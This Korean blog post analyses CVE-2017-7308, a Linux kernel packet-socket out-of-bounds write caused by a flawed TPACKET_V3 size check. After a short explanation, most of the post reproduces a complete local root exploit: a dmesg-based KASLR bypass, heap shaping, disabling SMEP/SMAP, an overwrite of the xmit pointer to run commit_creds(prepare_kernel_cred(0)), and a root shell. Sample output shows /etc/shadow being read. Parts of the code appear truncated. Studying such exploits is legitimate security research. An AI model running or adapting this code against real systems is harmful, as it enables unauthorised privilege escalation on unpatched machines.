[EXPLOIT] Linux Kernel - Packet Socket Local root Privilege Escalation(CVE-2017-7308,out-of-bound) 분석
정말 오랜만에 포스팅을 하네요. 최근에 공개된 Linux kenel 취약점에 대한 분석 내용으로 준비하였습니다. (예전에 Kernel OOB 취약점 써둔건 어디갔는지 모르겠네요.. 설마 지운건가? =_=)
Socket을 생성하고 사용하는 중에 out-of-bound가 일어나고, 이를 통해 권한상승까지 가능한 취약점이죠. 그럼 시작에 앞서 Socket과 Ring buffer에 대한 이야기를 먼저 할까 합니다.
소켓에는 여러가지 모드가 있는데 그 중 AF_PACKET을 사용하면 드라이버 수준에서 패킷을 보내거나 받을 수 있습니다. 이 과정에서 send(), recv()와 같은 syscall을 사용하게 되고 작업을 더 빠르게 하기 위해서 ring buffer라는 걸 사용합니다. ring buffer는 PACKET_TX_RING, PACKET_RX_RING 을 소켓 옵션으로 주어 생성할 수 있습니다.
Ring buffer?
네트워크 패킷은 엄청나게 많은 처리수를 가지기 때문에 성능 향상을 위해선 가변적인 크기를 가진 패킷의 저장공간이 필요합니다. 그걸 원형큐를 이용해 구현하였고 그게 Ring buffer입니다. (혹시라도 전공이 컴퓨터 관련이라면.. 접해봤겠죠?, 아니라면 구글신께..)
오늘 가장 중요한 부분입니다. (취약점 스포..) Ring buffer는 패킷을 저장하는데 사용하는 Memory 영역입니다.
각 패킷은 별도의 프레임에 저장되고 프레임은 블록으로 그룹화됩니다.PACKET_RX_RING으로 생성하는 TPACKET_V3 Ring buffer에선 프레임의 크기는 고정값이 아니죵.
패킷을 받을 때 커널은 데이터를 Ring buffer에 저장하려고 할겁니다. 그 과정을 좀 더 자세히 살펴보면.. 프레임이 블로보다 커지지 않게 체크하는 로직이 있고 데이터를 검증한 후 저장하던가 다른 블록으로 보내던가 합니다.
현재 블록에 공간이 있니?(Y/N) Y -> 저장! N -> 다른 블록으로 넘김
이러한 과정을 통해서 받은 패킷을 Ring buffer에 저장하여 조금 더 빠르게 데이터 통신을 하게됩니다. 오늘의 취약점은 이 Ring buffer의 검증하는 로직에서 발생한 문제이죠.
Vulnerability(Bypass block_size check logic)
아래 코드는 Ring buffer에서 데이터와 블록의 크기를 검증하는 구간인데.. 약간의 오류가 있습니다.
if (po->tp_version >= TPACKET_V3 &&
(int)(req->tp_block_size -
BLK_PLUS_PRIV(req_u->req3.tp_sizeof_priv)) <= 0)
goto out;
req_u->req3.tp_sizeof_priv)) <= 0 부분에서 req3.tp_sizeof_priv가 표현식 값을 int로 캐스팅하여 반환하면 큰 양수가 나오게 되고 <=0 비교에서 걸리지 않아 해당 부분으로 진입하지 않게됩니다.
A = req-> tp_block_size = 4096 = 0x1000
B = req_u-> req3.tp_sizeof_priv = (1 << 31) + 4096 = 0x80001000
BLK_PLUS_PRIV (B) = (1 << 31) + 4096 + 48 = 0x80001030
A - BLK_PLUS_PRIV (B) = 0x1000 - 0x80001030 = 0x7fffffd0
(int) 0x7fffffd0 = 0x7fffffd0> 0
이로써 크기 검증 로직을 피해갈 수 있으니 Ring buffer에서 블록보다 더 큰 프레임이 들어와도 탈출하지 않고 값이 쓰여지게 됩니다. 쓰여진단 소리는.. 커널 힙 영역 밖 부분으로 쓰기가 발생하게 되는거죠. (뭔가 무지 간단해서.. 놀램) 취약점이 발생한 포인트와 원리는 이해하였으니.. 바로 코드로 넘어가보죠.
kernel heap out-of-bounds!!
Aalysis code
공격코드 또한 단순합니다. (500줄인데?) Ring buffer를 사용하도록 소켓을 구성한 후 패킷을 처리할 때 마다 검증 로직을 거치치 않고 나가게 하면 되죠. 일단 버그 트리거 부분부터 보겠습니다.
int oob_setup(int offset) {
unsigned int maclen = ETH_HDR_LEN;
unsigned int netoff = TPACKET_ALIGN(TPACKET3_HDRLEN +
(maclen < 16 ? 16 : maclen));
unsigned int macoff = netoff - maclen;
unsigned int sizeof_priv = (1u<<31) + (1u<<30) + // req_u -> req3.tp_sizeof_priv에 들어갈 값을 세팅합니다.
0x8000 - BLK_HDR_LEN - macoff + offset;
return packet_socket_setup(0x8000, 2048, 2, sizeof_priv, 100); // 사실 요거 먼저 세팅하고.. socket 세팅을 하죠.
주목해야할 부분은 sizeof_priv 부분입니다. 이 친구로 인해 아까 검증로직이 풀리게 됩니다. sizeof_priv에 값을 세팅하고.. ring buffer를 만드는 부분을 보면..
void packet_socket_rx_ring_init(int s, unsigned int block_size,
unsigned int frame_size, unsigned int block_nr,
unsigned int sizeof_priv, unsigned int timeout) {
int v = TPACKET_V3; // TPACKET_V3로 지정하고..
int rv = setsockopt(s, SOL_PACKET, PACKET_VERSION, &v, sizeof(v)); // socket을 생성합니다.
if (rv < 0) {
perror("[-] setsockopt(PACKET_VERSION)");
struct tpacket_req3 req;
memset(&req, 0, sizeof(req));
req.tp_block_size = block_size; // block이랑 frame 크기를 지정
req.tp_frame_size = frame_size;
req.tp_block_nr = block_nr;
req.tp_frame_nr = (block_size * block_nr) / frame_size;
req.tp_retire_blk_tov = timeout;
req.tp_sizeof_priv = sizeof_priv; // 버그를 발생시키는 자리 [!]
req.tp_feature_req_word = 0;
rv = setsockopt(s, SOL_PACKET, PACKET_RX_RING, &req, sizeof(req)); // 중요한 부분이네요 PACKET_RX_RING로 Ring buffer를 사용하도록 설정합니다.
if (rv < 0) {
perror("[-] setsockopt(PACKET_RX_RING)");
Ring buffer를 사용하고, 아까 만든 sizeof_priv를 req.tp_sizeof_priv에 넣어 패킷 처리 시 검증로직을 거치지 않도록 수정합니다. 일단 Rung buffer를 사용하는 소켓 생성은 끝났습니다. (사실 모든게 끝난..)
이제 공격자는 패킷 전송을 통해서 블록보다 큰 프레임을 전송하고 이를 통해 발생된 oob를 가지고 원하는 걸 수행하면 되는거죠.
void oob_write(char *buffer, int size) {
loopback_send(buffer, size);
void loopback_send(char *buffer, int size) {
int s = socket(AF_PACKET, SOCK_RAW, IPPROTO_RAW); // 그냥 소켓 전송 함수.. 다만 ring buffer에 들어갈 때 검증을 거치지 않죠.
if (s == -1) {
perror("[-] socket(SOCK_RAW)");
packet_socket_send(s, buffer, size); // -----> if (sendto(s, buffer, size, 0, (struct sockaddr *)&sa,
// sizeof(sa)) < 0) {
이후에 보안로직을 우회하고 Root 권한을 획득합니다.
packet_sock은 패킷 전송마다 xmit 포인터를 호출하는데 xmit는 process context에서 호출됩니다. 이를 이용해서 xmit에 페이로드를 덮고 process context에서 실행시키도록(commit_creds(prepare_kernel_cred(0)을 실행) 해서 권한을 루트로 바꿉니다.
요약하면… 취약점을 통해 xmit 필드를 xmit가 userspace에 할당된 commit_creds(prepare_kernel_cred(0))을 가리키도록 덮어쓰고 패킷이 송신되면 xmit가 실행되기 때문에 xmit가 가리킨 commit_creds(~~~)가 실행되어 권한이 루트로 바뀌는거죠. 당연히 이 과정전에 KASLR이나 SMEP, SMAP 같은 보호로직을 풀어야하구요. (구글신께 물어보세욥)
Exploit code
// A proof-of-concept local root exploit for CVE-2017-7308.
// Includes a SMEP & SMAP bypass.
// Tested on 4.8.0-41-generic Ubuntu kernel.
// https://github.com/xairy/kernel-exploits/tree/master/CVE-2017-7308
// Usage:
// user@ubuntu:~$ uname -a
// Linux ubuntu 4.8.0-41-generic #44~16.04.1-Ubuntu SMP Fri Mar 3 ...
// user@ubuntu:~$ gcc pwn.c -o pwn
// user@ubuntu:~$ ./pwn
// [.] starting
// [.] namespace sandbox set up
// [.] KASLR bypass enabled, getting kernel addr
// [.] done, kernel text: ffffffff87000000
// [.] commit_creds: ffffffff870a5cf0
// [.] prepare_kernel_cred: ffffffff870a60e0
// [.] native_write_cr4: ffffffff87064210
// [.] padding heap
// [.] done, heap is padded
// [.] SMEP & SMAP bypass enabled, turning them off
// [.] done, SMEP & SMAP should be off now
// [.] executing get root payload 0x401516
// [.] done, should be root now
// [.] checking if we got root
// [+] got r00t ^_^
// root@ubuntu:/home/user# cat /etc/shadow
// root:!:17246:0:99999:7:::
// daemon:*:17212:0:99999:7:::
// bin:*:17212:0:99999:7:::
// ...
// Andrey Konovalov <andreyknvl@gmail.com>
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdarg.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sched.h>
#include <sys/ioctl.h>
#include <sys/klog.h>
#include <sys/mman.h>
#include <sys/socket.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <arpa/inet.h>
#include <linux/if_packet.h>
#include <linux/ip.h>
#include <linux/udp.h>
#include <netinet/if_ether.h>
#include <net/if.h>
// Will be overwritten if ENABLE_KASLR_BYPASS
unsigned long KERNEL_BASE = 0xffffffff81000000ul;
// Kernel symbol offsets
#define COMMIT_CREDS 0xa5cf0ul
#define PREPARE_KERNEL_CRED 0xa60e0ul
#define NATIVE_WRITE_CR4 0x64210ul
// Should have SMEP and SMAP bits disabled
#define CR4_DESIRED_VALUE 0x407f0ul
#define KMALLOC_PAD 512
#define PAGEALLOC_PAD 1024
// * * * * * * * * * * * * * * Kernel structs * * * * * * * * * * * * * * * *
typedef uint32_t u32;
// $ pahole -C hlist_node ./vmlinux
struct hlist_node {
struct hlist_node * next; /* 0 8 */
struct hlist_node * * pprev; /* 8 8 */
// $ pahole -C timer_list ./vmlinux
struct timer_list {
struct hlist_node entry; /* 0 16 */
long unsigned int expires; /* 16 8 */
void (*function)(long unsigned int); /* 24 8 */
long unsigned int data; /* 32 8 */
u32 flags; /* 40 4 */
int start_pid; /* 44 4 */
void * start_site; /* 48 8 */
char start_comm[16]; /* 56 16 */
// packet_sock->rx_ring->prb_bdqc->retire_blk_timer
#define TIMER_OFFSET 896
// pakcet_sock->xmit
#define XMIT_OFFSET 1304
// * * * * * * * * * * * * * * * Helpers * * * * * * * * * * * * * * * * * *
void packet_socket_rx_ring_init(int s, unsigned int block_size,
unsigned int frame_size, unsigned int block_nr,
unsigned int sizeof_priv, unsigned int timeout) {
int v = TPACKET_V3;
int rv = setsockopt(s, SOL_PACKET, PACKET_VERSION, &v, sizeof(v));
if (rv < 0) {
perror("[-] setsockopt(PACKET_VERSION)");
struct tpacket_req3 req;
memset(&req, 0, sizeof(req));
req.tp_block_size = block_size;
req.tp_frame_size = frame_size;
req.tp_block_nr = block_nr;
req.tp_frame_nr = (block_size * block_nr) / frame_size;
req.tp_retire_blk_tov = timeout;
req.tp_sizeof_priv = sizeof_priv;
req.tp_feature_req_word = 0;
rv = setsockopt(s, SOL_PACKET, PACKET_RX_RING, &req, sizeof(req));
if (rv < 0) {
perror("[-] setsockopt(PACKET_RX_RING)");
int packet_socket_setup(unsigned int block_size, unsigned int frame_size,
unsigned int block_nr, unsigned int sizeof_priv, int timeout) {
int s = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL));
if (s < 0) {
perror("[-] socket(AF_PACKET)");
packet_socket_rx_ring_init(s, block_size, frame_size, block_nr,
sizeof_priv, timeout);
struct sockaddr_ll sa;
memset(&sa, 0, sizeof(sa));
sa.sll_family = PF_PACKET;
sa.sll_protocol = htons(ETH_P_ALL);
sa.sll_ifindex = if_nametoindex("lo");
sa.sll_hatype = 0;
sa.sll_pkttype = 0;
sa.sll_halen = 0;
int rv = bind(s, (struct sockaddr *)&sa, sizeof(sa));
if (rv < 0) {
perror("[-] bind(AF_PACKET)");
return s;
void packet_socket_send(int s, char *buffer, int size) {
struct sockaddr_ll sa;
memset(&sa, 0, sizeof(sa));
sa.sll_ifindex = if_nametoindex("lo");
sa.sll_halen = ETH_ALEN;
if (sendto(s, buffer, size, 0, (struct sockaddr *)&sa,
sizeof(sa)) < 0) {
perror("[-] sendto(SOCK_RAW)");
void loopback_send(char *buffer, int size) {
if (s == -1) {
perror("[-] socket(SOCK_RAW)");
packet_socket_send(s, buffer, size);
int packet_sock_kmalloc() {
int s = socket(AF_PACKET, SOCK_DGRAM, htons(ETH_P_ARP));
if (s == -1) {
perror("[-] socket(SOCK_DGRAM)");
return s;
void packet_sock_timer_schedule(int s, int timeout) {
packet_socket_rx_ring_init(s, 0x1000, 0x1000, 1, 0, timeout);
void packet_sock_id_match_trigger(int s) {
char buffer[16];
packet_socket_send(s, &buffer[0], sizeof(buffer));
// * * * * * * * * * * * * * * * Trigger * * * * * * * * * * * * * * * * * *
#define ALIGN(x, a) __ALIGN_KERNEL((x), (a))
#define __ALIGN_KERNEL(x, a) __ALIGN_KERNEL_MASK(x, (typeof(x))(a) - 1)
#define __ALIGN_KERNEL_MASK(x, mask) (((x) + (mask)) & ~(mask))
#define V3_ALIGNMENT (8)
#define BLK_HDR_LEN (ALIGN(sizeof(struct tpacket_block_desc), V3_ALIGNMENT))
#define ETH_HDR_LEN sizeof(struct ethhdr)
#define IP_HDR_LEN sizeof(struct iphdr)
#define UDP_HDR_LEN sizeof(struct udphdr)
int oob_setup(int offset) {
unsigned int maclen = ETH_HDR_LEN;
unsigned int netoff = TPACKET_ALIGN(TPACKET3_HDRLEN +
(maclen < 16 ? 16 : maclen));
unsigned int macoff = netoff - maclen;
unsigned int sizeof_priv = (1u<<31) + (1u<<30) +
0x8000 - BLK_HDR_LEN - macoff + offset;
return packet_socket_setup(0x8000, 2048, 2, sizeof_priv, 100);
void oob_write(char *buffer, int size) {
loopback_send(buffer, size);
void oob_timer_execute(void *func, unsigned long arg) {
oob_setup(2048 + TIMER_OFFSET - 8);
int i;
for (i = 0; i < 32; i++) {
int timer = packet_sock_kmalloc();
packet_sock_timer_schedule(timer, 1000);
char buffer[2048];
memset(&buffer[0], 0, sizeof(buffer));
struct timer_list *timer = (struct timer_list *)&buffer[8];
timer->function = func;
timer->data = arg;
timer->flags = 1;
oob_write(&buffer[0] + 2, sizeof(*timer) + 8 - 2);
void oob_id_match_execute(void *func) {
int s = oob_setup(2048 + XMIT_OFFSET - 64);
int ps[32];
int i;
for (i = 0; i < 32; i++)
ps[i] = packet_sock_kmalloc();
char buffer[2048];
memset(&buffer[0], 0, 2048);
void **xmit = (void **)&buffer[64];
*xmit = func;
oob_write((char *)&buffer[0] + 2, sizeof(*xmit) + 64 - 2);
for (i = 0; i < 32; i++)
// * * * * * * * * * * * * * * Heap shaping * * * * * * * * * * * * * * * * *
void kmalloc_pad(int count) {
int i;
for (i = 0; i < count; i++)
void pagealloc_pad(int count) {
packet_socket_setup(0x8000, 2048, count, 0, 100);
// * * * * * * * * * * * * * * * Getting root * * * * * * * * * * * * * * * *
typedef unsigned long __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
void get_root_payload(void) {
((_commit_creds)(KERNEL_BASE + COMMIT_CREDS))(
((_prepare_kernel_cred)(KERNEL_BASE + PREPARE_KERNEL_CRED))(0)
// * * * * * * * * * * * * * Simple KASLR bypass * * * * * * * * * * * * * * *
unsigned long get_kernel_addr() {
int size = klogctl(SYSLOG_ACTION_SIZE_BUFFER, 0, 0);
if (size == -1) {
perror("[-] klogctl(SYSLOG_ACTION_SIZE_BUFFER)");
size = (size / getpagesize() + 1) * getpagesize();
char *buffer = (char *)mmap(NULL, size, PROT_READ|PROT_WRITE,
size = klogctl(SYSLOG_ACTION_READ_ALL, &buffer[0], size);
if (size == -1) {
perror("[-] klogctl(SYSLOG_ACTION_READ_ALL)");
const char *needle1 = "Freeing SMP";
char *substr = (char *)memmem(&buffer[0], size, needle1, strlen(needle1));
if (substr == NULL) {
fprintf(stderr, "[-] substring '%s' not found in dmesg\n", needle1);
for (size = 0; substr[size] != '\n'; size++);
const char *needle2 = "ffff";
substr = (char *)memmem(&substr[0], size, needle2, strlen(needle2));
if (substr == NULL) {
fprintf(stderr, "[-] substring '%s' not found in dmesg\n", needle2);
char *endptr = &substr[16];
unsigned long r = strtoul(&substr[0], &endptr, 16);
r &= 0xfffffffffff00000ul;
r -= 0x1000000ul;
return r;
// * * * * * * * * * * * * * * * * * Main * * * * * * * * * * * * * * * * * *
void exec_shell() {
char *shell = "/bin/bash";
char *args[] = {shell, "-i", NULL};
execve(shell, args, NULL);
void fork_shell() {
pid_t rv;
rv = fork();
if (rv == -1) {
perror("[-] fork()");
if (rv == 0) {
bool is_root() {
// We can't simple check uid, since we're running inside a namespace
// with uid set to 0. Try opening /etc/shadow instead.
int fd = open("/etc/shadow", O_RDONLY);
if (fd == -1)
return false;
return true;
void check_root() {
printf("[.] checking if we got root\n");
if (!is_root()) {
printf("[-] something went wrong =(\n");
printf("[+] got r00t ^_^\n");
// Fork and exec instead of just doing the exec to avoid potential
// memory corruptions when closing packet sockets.
bool write_file(const char* file, const char* what, ...) {
char buf[1024];
va_list args;
va_start(args, what);
vsnprintf(buf, sizeof(buf), what, args);
buf[sizeof(buf) - 1] = 0;
int len = strlen(buf);
int fd = open(file, O_WRONLY | O_CLOEXEC);
if (fd == -1)
return false;
if (write(fd, buf, len) != len) {
return false;
return true;
void setup_sandbox() {
int real_uid = getuid();
int real_gid = getgid();
if (unshare(CLONE_NEWUSER) != 0) {
perror("[-] unshare(CLONE_NEWUSER)");
if (unshare(CLONE_NEWNET) != 0) {
perror("[-] unshare(CLONE_NEWUSER)");
if (!write_file("/proc/self/setgroups", "deny")) {
perror("[-] write_file(/proc/self/set_groups)");
if (!write_file("/proc/self/uid_map", "0 %d 1\n", real_uid)){
perror("[-] write_file(/proc/self/uid_map)");
if (!write_file("/proc/self/gid_map", "0 %d 1\n", real_gid)) {
perror("[-] write_file(/proc/self/gid_map)");
cpu_set_t my_set;
CPU_SET(0, &my_set);
if (sched_setaffinity(0, sizeof(my_set), &my_set) != 0) {
perror("[-] sched_setaffinity()");
if (system("/sbin/ifconfig lo up") != 0) {
perror("[-] system(/sbin/ifconfig lo up)");
int main() {
printf("[.] starting\n");
printf("[.] namespace sandbox set up\n");
printf("[.] KASLR bypass enabled, getting kernel addr\n");
KERNEL_BASE = get_kernel_addr();
printf("[.] done, kernel text: %lx\n", KERNEL_BASE);
printf("[.] commit_creds: %lx\n", KERNEL_BASE + COMMIT_CREDS);
printf("[.] prepare_kernel_cred: %lx\n", KERNEL_BASE + PREPARE_KERNEL_CRED);
printf("[.] native_write_cr4: %lx\n", KERNEL_BASE + NATIVE_WRITE_CR4);
printf("[.] padding heap\n");
printf("[.] done, heap is padded\n");
printf("[.] SMEP & SMAP bypass enabled, turning them off\n");
oob_timer_execute((void *)(KERNEL_BASE + NATIVE_WRITE_CR4), CR4_DESIRED_VALUE);
printf("[.] done, SMEP & SMAP should be off now\n");
printf("[.] executing get root payload %p\n", &get_root_payload);
oob_id_match_execute((void *)&get_root_payload);
printf("[.] done, should be root now\n");
while (1) sleep(1000);
return 0;
